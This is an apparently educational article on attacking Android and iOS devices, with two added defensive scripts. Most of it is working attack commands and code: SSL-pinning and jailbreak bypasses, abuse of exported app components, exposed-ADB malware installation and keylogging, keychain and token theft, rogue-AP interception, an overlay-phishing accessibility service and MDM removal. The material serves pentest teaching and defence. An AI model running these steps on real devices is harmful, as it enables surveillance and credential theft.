# Mobile Attacks: Hacking the Device in Every Pocket
Mobile devices are always on, always connected, and hold our most sensitive data. From app vulnerabilities to baseband exploits, mobile security is a constantly evolving battlefield between attackers and defenders.
## Why Mobile Matters
Mobile devices contain email, banking apps, MFA tokens, corporate data, and personal photos. They track location 24/7. Compromising a mobile device often means compromising the entire digital life of the target—and their employer.
## Mobile Architecture & Attack Surface
```text
┌─────────────────────────────────────────────────────────────────────┐
│                        MOBILE ATTACK SURFACE                        │
├─────────────────────────────────────────────────────────────────────┤
│                                                                     │
│   ┌──────────────┐      ┌──────────────┐      ┌──────────────┐      │
│   │   PHYSICAL   │      │   NETWORK    │      │ APPLICATION  │      │
│   │ USB Debug    │      │ WiFi/BT/Cell │      │ App vulns    │      │
│   │ Juice Jacking│      │ MITM attacks │      │ Malicious    │      │
│   │ Evil Maid    │      │ Rogue AP     │      │ Deeplinks    │      │
│   └──────┬───────┘      └──────┬───────┘      └──────┬───────┘      │
│          │                     │                     │              │
│          └─────────────────────┼─────────────────────┘              │
│                                ▼                                    │
│   ┌─────────────────────────────────────────────────────────────┐   │
│   │                      OPERATING SYSTEM                       │   │
│   │   ┌─────────────┐    ┌─────────────┐    ┌─────────────┐     │   │
│   │   │   Kernel    │    │   Sandbox   │    │  Keychain/  │     │   │
│   │   │  Exploits   │    │   Escapes   │    │  Keystore   │     │   │
│   │   └─────────────┘    └─────────────┘    └─────────────┘     │   │
│   └────────────────────────────┬────────────────────────────────┘   │
│                                ▼                                    │
│   ┌─────────────────────────────────────────────────────────────┐   │
│   │                      HARDWARE/BASEBAND                      │   │
│   │        Secure Enclave, TrustZone, Baseband processor        │   │
│   └─────────────────────────────────────────────────────────────┘   │
│                                                                     │
└─────────────────────────────────────────────────────────────────────┘
```
## Android Attacks

### APK Analysis

```bash
# Decompile APK (smali + resources)
apktool d target.apk -o decompiled/
# Convert to Java source
jadx -d output/ target.apk
# Look for hardcoded secrets
grep -rE '(api[_-]?key|password|secret|token)' decompiled/
grep -rE 'https?://[a-zA-Z0-9.-]+' decompiled/   # Find URLs
# Check AndroidManifest.xml for exported components and permissions
grep -E 'exported|permission|intent' decompiled/AndroidManifest.xml
# Find SQL injection points in the decompiled Java
grep -r "rawQuery\|execSQL" output/
```
### Dynamic Analysis

```bash
# Frida hooks for Android (spawn the app with a script attached)
frida -U -f com.target.app -l script.js
# Bypass SSL pinning
frida -U -f com.target.app -l ssl_bypass.js
# Common Frida scripts
# - SSL pinning bypass
# - Root detection bypass
# - Encryption key extraction
# - Function hooking

# Objection (Frida wrapper)
objection -g com.target.app explore
objection> android sslpinning disable
objection> android root disable
```
### Exploiting Android Components

```bash
# Exported Activities - launch without authentication
adb shell am start -n com.target.app/.AdminActivity
# Content Providers - data theft
adb shell content query --uri content://com.target.app.provider/users
# Broadcast Receivers - trigger actions
adb shell am broadcast -a com.target.ADMIN_ACTION
# Deep Links - bypass navigation
adb shell am start -a android.intent.action.VIEW \
    -d "app://target/admin/reset?user=victim"
```
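The defensive counterpart to these probes is checking the manifest for components that can be reached this way before the app ships. The auditor below is an added example, not code from the article; the sample manifest is constructed, and the implicit-export rule it applies (an `<intent-filter>` without `android:exported` means exported) is the default for apps targeting API levels below 31.

```python
# Added example, not from the article: find manifest components another app can
# reach without holding a permission, which is what the `am start`, `content query`
# and `am broadcast` probes above rely on. The sample manifest is constructed.
import xml.etree.ElementTree as ET

A = "{http://schemas.android.com/apk/res/android}"  # android: attribute namespace
COMPONENT_TAGS = ("activity", "activity-alias", "service", "receiver", "provider")

SAMPLE_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.example.app">
  <application>
    <activity android:name=".AdminActivity" android:exported="true"/>
    <service android:name=".SyncService" android:exported="false"/>
    <provider android:name=".UserProvider" android:exported="true"
        android:authorities="com.example.app.provider"
        android:permission="com.example.app.READ_USERS"/>
    <receiver android:name=".AdminReceiver">
      <intent-filter><action android:name="com.example.ADMIN_ACTION"/></intent-filter>
    </receiver>
  </application>
</manifest>"""


def find_exposed_components(manifest_xml):
    """Return (tag, name, reason) for each component other apps can reach with no
    permission check. A component without android:exported is treated as exported
    when it declares an <intent-filter>: the default for targetSdkVersion < 31."""
    root = ET.fromstring(manifest_xml)
    findings = []
    for tag in COMPONENT_TAGS:
        for comp in root.iter(tag):
            exported = comp.get(A + "exported")
            if exported == "true":
                reason = 'android:exported="true"'
            elif exported is None and comp.find("intent-filter") is not None:
                reason = "implicitly exported by intent-filter"
            else:
                continue  # explicitly private, or no way to reach it
            if comp.get(A + "permission"):
                continue  # reachable, but callers must hold this permission
            findings.append((tag, comp.get(A + "name"), reason))
    return findings


if __name__ == "__main__":
    for tag, name, reason in find_exposed_components(SAMPLE_MANIFEST):
        print(f"[{tag}] {name}: {reason}")
```

Run it against the `AndroidManifest.xml` that `apktool d` writes; every finding is a component to either mark `android:exported="false"` or protect with a permission.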
### ADB Exploitation

```bash
# Check for exposed ADB
nmap -p 5555 TARGET_IP
adb connect TARGET_IP:5555
# Extract app data (requires root or debuggable app)
# adb backup is deprecated since Android 12 and skips apps that set android:allowBackup="false"
adb backup -f backup.ab com.target.app
java -jar abe.jar unpack backup.ab backup.tar
# Install malicious app
adb install malware.apk
# Screen capture and keylogging
adb shell screencap -p /sdcard/screen.png
adb shell getevent   # Raw input events
```
## iOS Attacks

### IPA Analysis

```bash
# Unzip IPA (it's just a ZIP)
unzip target.ipa -d extracted/
# Decrypt app binary (requires jailbroken device)
# Use frida-ios-dump or clutch
# Analyze the (decrypted) binary
otool -L extracted/Payload/App.app/App   # List linked libraries
strings extracted/Payload/App.app/App | grep -i key
class-dump extracted/Payload/App.app/App > headers.h
# Check for insecure data storage
plutil -p extracted/Payload/App.app/Info.plist
```
### Keychain Extraction

```bash
# On jailbroken device
keychain-dumper
# Via Frida
frida -U -f com.target.app -l keychain_dump.js
# Common keychain items:
# - Authentication tokens
# - API keys
# - Passwords
# - Certificates
```
### iOS-Specific Attacks

```javascript
// Frida script to bypass jailbreak detection
var jailbreakPaths = [
  "/Applications/Cydia.app",
  "/usr/sbin/sshd",
  "/private/var/stash"
];
Interceptor.attach(Module.findExportByName(null, "stat"), {
  onEnter: function(args) {
    var path = Memory.readUtf8String(args[0]);
    if (jailbreakPaths.includes(path)) {
      args[0] = Memory.allocUtf8String("/nonexistent");
    }
  }
});
```
## Mobile Network Attacks

### Man-in-the-Middle

```bash
# Set up rogue AP
hostapd -B hostapd.conf
dnsmasq -C dnsmasq.conf
# Capture traffic
mitmproxy -p 8080
# For SSL interception
mitmproxy --mode transparent --ssl-insecure
# Push certificate to Android
adb push mitmproxy-ca-cert.cer /sdcard/
# Then install via Settings > Security
```
### SSL Pinning Bypass

```javascript
// Universal SSL pinning bypass (Frida)
Java.perform(function() {
  var TrustManager = Java.use('javax.net.ssl.X509TrustManager');
  var SSLContext = Java.use('javax.net.ssl.SSLContext');
  var TrustAllManager = Java.registerClass({
    name: 'TrustAllManager',
    implements: [TrustManager],
    methods: {
      checkClientTrusted: function(chain, authType) {},
      checkServerTrusted: function(chain, authType) {},
      getAcceptedIssuers: function() { return []; }
    }
  });
  var ctx = SSLContext.getInstance("TLS");
  ctx.init(null, [TrustAllManager.$new()], null);
  SSLContext.setDefault(ctx);
});
```
### Bluetooth Attacks

```bash
# Bluetooth reconnaissance
hcitool scan
hcitool inq
# BLE enumeration (interactive gatttool session)
gatttool -b TARGET_MAC -I
> connect
> primary
> characteristics
# Bluetooth sniffing
btlejack -c TARGET_MAC
# Common BLE vulnerabilities:
# - Unencrypted characteristics
# - Authentication bypass
# - Replay attacks
```
## Mobile Malware Techniques

### Android Malware Capabilities

```java
// Accessibility Service abuse (Android) - illustrative skeleton
public class MaliciousAccessibilityService extends AccessibilityService {
    @Override
    public void onAccessibilityEvent(AccessibilityEvent event) {
        // Capture all screen content
        String text = event.getText().toString();
        // Perform clicks
        performGlobalAction(GLOBAL_ACTION_BACK);
        // Overlay attacks
        if (event.getPackageName().equals("com.bank.app")) {
            showPhishingOverlay();
        }
    }
}
```
### Spyware Features
| Capability | Android Permission | iOS Equivalent |
|---|---|---|
| Location tracking | ACCESS_FINE_LOCATION | Location Services |
| Call recording | RECORD_AUDIO + READ_PHONE_STATE | Requires jailbreak |
| SMS interception | READ_SMS, RECEIVE_SMS | Requires jailbreak |
| Camera access | CAMERA | Camera permission |
| Keylogging | Accessibility Service | Requires jailbreak |
## MDM & Enterprise Attacks

### MDM Bypass Techniques

```bash
# Android - Remove MDM profile
# Requires root or ADB access
adb shell pm disable-user com.mdm.agent
# iOS - MDM profile removal
# On jailbroken device, delete:
#   /var/db/ConfigurationProfiles/
# Prevent MDM enrollment
# Block MDM server at network level
iptables -A OUTPUT -d mdm.company.com -j DROP
```
### Corporate App Attacks

```bash
# Extract corporate app data
adb backup -f corp.ab -noapk com.corp.email
java -jar abe.jar unpack corp.ab corp.tar
# Look for cached credentials
find . -name "*.db" -exec sqlite3 {} ".dump" \; | grep -i password
# OAuth token theft
grep -r "access_token\|refresh_token" .
```
## Essential Mobile Testing Tools
| Tool | Platform | Purpose |
|---|---|---|
| Frida | Both | Dynamic instrumentation, hooking |
| Objection | Both | Runtime mobile exploration (Frida-based) |
| MobSF | Both | Automated static/dynamic analysis |
| apktool/jadx | Android | APK decompilation |
| class-dump | iOS | Objective-C class extraction |
| Burp Suite | Both | HTTP/S traffic interception |
## Detection & Protection

### Mobile Defense Strategies
- MDM Enrollment: Enforce policies, remote wipe capability
- App Vetting: Scan apps before deployment
- Certificate Pinning: Prevent MITM attacks
- Root/Jailbreak Detection: Identify compromised devices
- Biometric Auth: Stronger than PINs
- Network Monitoring: Detect suspicious traffic patterns
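Several of the techniques in this article leave state on the device that a posture check can catch: ADB listening on TCP (ADB Exploitation), an unexpected accessibility service (Android Malware Capabilities) and a disabled MDM agent (MDM Bypass Techniques). The script below is an added example, not from the article; the MDM package name, the allowlist entry and the sample device outputs are assumptions, and it parses the output of `getprop`, `settings get secure` and `pm list packages -d` as collected over `adb shell` by a fleet tool.

```python
# Added example, not from the article: a fleet posture check that turns three of
# the techniques above (ADB over TCP, accessibility-service abuse, disabling the
# MDM agent) into detections. It parses the raw output of
#   adb shell getprop service.adb.tcp.port
#   adb shell settings get secure enabled_accessibility_services
#   adb shell pm list packages -d
# The device outputs and package names below are constructed placeholders.
MDM_AGENT = "com.mdm.agent"  # placeholder: your organisation's MDM package
ALLOWED_ACCESSIBILITY = {  # approved services, e.g. the platform screen reader
    "com.google.android.marvin.talkback/com.google.android.marvin.talkback.TalkBackService",
}

SAMPLE_TCP_PORT = "5555\n"  # USB-only devices print "" or "-1"
SAMPLE_A11Y = ("com.google.android.marvin.talkback/com.google.android.marvin.talkback.TalkBackService:"
               "com.fakeupdate.svc/com.fakeupdate.svc.OverlayService\n")
SAMPLE_DISABLED = "package:com.mdm.agent\npackage:com.android.stk\n"


def parse_disabled_packages(pm_output):
    """`pm list packages -d` prints one `package:<name>` line per disabled app."""
    return {ln[len("package:"):] for ln in pm_output.splitlines() if ln.startswith("package:")}


def parse_accessibility_services(settings_output):
    """The setting is a colon-separated list of package/ServiceClass components;
    `null` or an empty string means no service is enabled."""
    value = settings_output.strip()
    return set() if value in ("", "null") else {c for c in value.split(":") if c}


def assess_posture(tcp_port, a11y_setting, pm_disabled,
                   mdm_agent=MDM_AGENT, allowed=ALLOWED_ACCESSIBILITY):
    """Return (severity, finding) tuples; an empty list means the device is compliant."""
    findings = []
    port = tcp_port.strip()
    if port.isdigit() and int(port) > 0:
        findings.append(("high", f"ADB reachable over TCP port {port}"))
    for svc in sorted(parse_accessibility_services(a11y_setting) - allowed):
        findings.append(("high", f"unapproved accessibility service enabled: {svc}"))
    if mdm_agent in parse_disabled_packages(pm_disabled):
        findings.append(("critical", f"MDM agent {mdm_agent} is disabled"))
    return findings


if __name__ == "__main__":
    for severity, msg in assess_posture(SAMPLE_TCP_PORT, SAMPLE_A11Y, SAMPLE_DISABLED):
        print(f"{severity.upper():<9}{msg}")
```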